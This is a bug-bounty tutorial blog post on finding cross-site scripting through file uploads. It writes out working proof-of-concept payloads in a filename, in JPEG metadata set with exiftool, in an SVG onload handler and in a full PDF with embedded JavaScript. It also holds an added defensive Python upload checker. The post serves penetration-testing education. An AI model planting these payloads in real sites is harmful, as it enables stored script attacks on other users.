File Upload XSS | Find XSS in a different way while doing Bug bounty and Pentesting

Hey guys, this is TheToySec, back again with another post. In this post we will discuss file upload XSS and how to find XSS just by uploading a file, both in bug bounty hunting and in penetration testing. So without further delay, let's start.

So before talking about file upload XSS, let's understand: what is XSS?

XSS stands for cross-site scripting, a client-side injection vulnerability that allows an attacker to inject and execute malicious code in a website from the client side. For more information you can refer to What is XSS and the XSS Cheat Sheet.

 

File Upload XSS

File upload functionality is a serious chance to find cross-site scripting in a web application.
As we know, the majority of web applications allow their users to upload files for numerous purposes, such as updating a profile picture or attaching pictures, PDFs and other files to a comment, and these features are a handy place to look for loopholes. So let's see how to attack these entry points that accept file uploads in order to find XSS.
There are different techniques to check for file upload XSS vulnerabilities.
Find XSS using File Name
Well, the filename is usually reflected on the web page after you upload a file, so you can change the filename to an XSS payload and try to upload it to the web application. XSS may be triggered right there. For example, the file name can be "><img src=x onerror=prompt("XSS")>.jpg
If you get an error while creating such a file on Windows (characters like " and > are not allowed in Windows file names), try it in Kali Linux, where the name will be accepted without error.
Find XSS using Meta Data
So you might be wondering: what is this metadata?
Well, metadata simply provides information about the other data attached to the same file.
You could also say it is data about data.
Now let's create metadata containing an XSS payload using ExifTool in Kali Linux.
First, let's inspect a file:
exiftool hello.jpg

Type the following command to write the XSS payload into the Artist tag with ExifTool (note the space before the file name):

exiftool -Artist='"><script>alert(1)</script>' hello.jpg

 

Let's confirm whether the payload is embedded in the metadata by running the following command again:

exiftool hello.jpg

The Artist field in the output confirms that the payload was embedded successfully. In my case I created a random image file named hello.jpg; you can use any name and embed any payload.

 

Find XSS by uploading SVG file

If the web application allows uploading files with the SVG extension, which is also an image type, then we can simply try to embed the XSS payload in an SVG file.

Here's how we can make an SVG file and embed the payload for XSS.

Copy and paste the following code (the root element needs the SVG namespace and a closing tag, otherwise the file is not parsed as SVG):

<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"></svg>

Now save it with the SVG file extension, e.g. XSS.svg, and upload it to the web application where SVG files are allowed. If there is no proper sanitization of SVG files then hopefully you'll get an XSS!

 

Find XSS by uploading PDF

If there is a feature to upload a PDF file, then we can simply try to embed the XSS payload in a PDF file.

Here's how we can make a PDF file and embed the payload for XSS.

Copy and paste the following code:

%PDF-1.3
% 
1 0 obj
<</Pages 2 0 R /Type /Catalog>>
endobj
2 0 obj
<</Count 1 /Kids [3 0 R] /Type /Pages>>
endobj
3 0 obj
<</AA
<</O
<</JS
(
try {
app.alert\("Hacked by none"\)
} catch \(e\) {
app.alert\(e.message\);
}
) 
/S /JavaScript>>>>
/Annots [] /Contents 4 0 R /MediaBox [0 0 612 792] /Parent 2 0 R
/Resources
<</Font <</F1 <</BaseFont /Helvetica /Subtype /Type1 /Type /Font>>>>>>
/Type /Page>>
endobj
4 0 obj
<</Length 21>>
stream

BT
/F1 24 Tf
ET

endstream
endobj
xref
0 5
0000000000 65535 f
0000000015 00000 n
0000000062 00000 n
0000000117 00000 n
0000000424 00000 n
trailer

<</Root 1 0 R /Size 5>>
startxref
493
%%EOF

Now save it with the PDF file extension, e.g. poc-1.pdf, and upload it to the web application where PDF files are allowed. If there is no proper sanitization of PDF files then hopefully you'll get an XSS!
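To show what closes these four vectors on the server side, here is an added defensive check in Python (my own example, not code from the original post): the user's filename is never stored or echoed verbatim, SVG/XML is refused as an image, the JPEG APP1..APP15 segments (where Exif tags such as Artist live) are stripped, and PDFs carrying /JavaScript, /JS, /AA or /OpenAction are refused; the function names are mine and SAMPLE_JPEG is a constructed minimal JPEG containing the Artist payload from above.

```python
import html
import re
import secrets

MAGIC = {"jpg": b"\xff\xd8\xff", "jpeg": b"\xff\xd8\xff", "pdf": b"%PDF-"}   # accepted types

def safe_stored_name(original: str) -> str:
    # Never store or reflect the user's filename verbatim: keep an alphanumeric
    # extension only and generate the base name ourselves.
    ext = original.rsplit(".", 1)[-1].lower() if "." in original else ""
    ext = re.sub(r"[^a-z0-9]", "", ext)[:5]
    return secrets.token_hex(8) + ("." + ext if ext else "")

def strip_jpeg_app_segments(data: bytes) -> bytes:
    # Drop APP1..APP15 segments (Exif/XMP, where tags such as Artist live); SOI, APP0
    # and other segments stay. Copying stops at SOS: the scan data after it has no segments.
    out, i = bytearray(data[:2]), 2
    while i + 4 <= len(data) and data[i] == 0xFF:
        marker = data[i + 1]
        if marker == 0xDA:                      # SOS: copy the rest unchanged
            return bytes(out + data[i:])
        seg_end = i + 2 + int.from_bytes(data[i + 2:i + 4], "big")
        if not 0xE1 <= marker <= 0xEF:
            out += data[i:seg_end]
        i = seg_end
    return bytes(out + data[i:])

def check_upload(original_name: str, data: bytes) -> dict:
    # Returns the decision; on accept, what to store and how to serve it (ideally from a separate origin).
    ext = original_name.rsplit(".", 1)[-1].lower() if "." in original_name else ""
    if ext == "svg" or data.lstrip()[:5].lower() in (b"<?xml", b"<svg "):
        return {"accept": False, "reason": "SVG/XML is not accepted as an image"}
    if ext not in MAGIC or not data.startswith(MAGIC[ext]):
        return {"accept": False, "reason": "extension does not match file content"}
    if ext == "pdf" and re.search(rb"/(JavaScript|JS|AA|OpenAction)\b", data):
        return {"accept": False, "reason": "PDF carries JavaScript or auto-actions"}
    if ext != "pdf":
        data = strip_jpeg_app_segments(data)
    return {"accept": True, "data": data, "stored_name": safe_stored_name(original_name),
            "display_name": html.escape(original_name, quote=True),   # safe to echo in HTML
            "headers": {"Content-Type": "application/pdf" if ext == "pdf" else "image/jpeg",
                        "X-Content-Type-Options": "nosniff",
                        "Content-Disposition": "attachment" if ext == "pdf" else "inline"}}

def _seg(marker: int, payload: bytes) -> bytes:        # one JPEG marker segment
    return b"\xff" + bytes([marker]) + (len(payload) + 2).to_bytes(2, "big") + payload

SAMPLE_JPEG = (b"\xff\xd8" + _seg(0xE0, b"JFIF\x00\x01\x01")            # constructed sample
               + _seg(0xE1, b'Exif\x00\x00Artist\x00"><script>alert(1)</script>')
               + _seg(0xDB, bytes(65)) + _seg(0xDA, b"\x01\x01\x00\x00\x3f\x00")
               + b"\x12\x34\xff\xd9")
```

Serving user files from a separate origin (a dedicated download domain) remains the real fix for whatever a sanitizer misses; the checks here reduce what reaches that origin in the first place.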

 

Disclaimer: Hackerinthehouse, its author and its affiliates won't be responsible for any actions made by you. If you do anything illegal with the help of this article then you might be caught, and at that time do not use the name ToySec, ha ha ha 😂😂, just kidding. This article is published for security research and education purposes only. It is the end user's responsibility to obey all applicable local, state and federal laws.

 

If you really liked this post then give your reaction and don't forget to share it with others. Until then, we will meet again with another interesting topic.

Follow me here: https://www.linkedin.com/in/soumyaranjanpradhan/

Thank you for reading this article, and have a nice stay!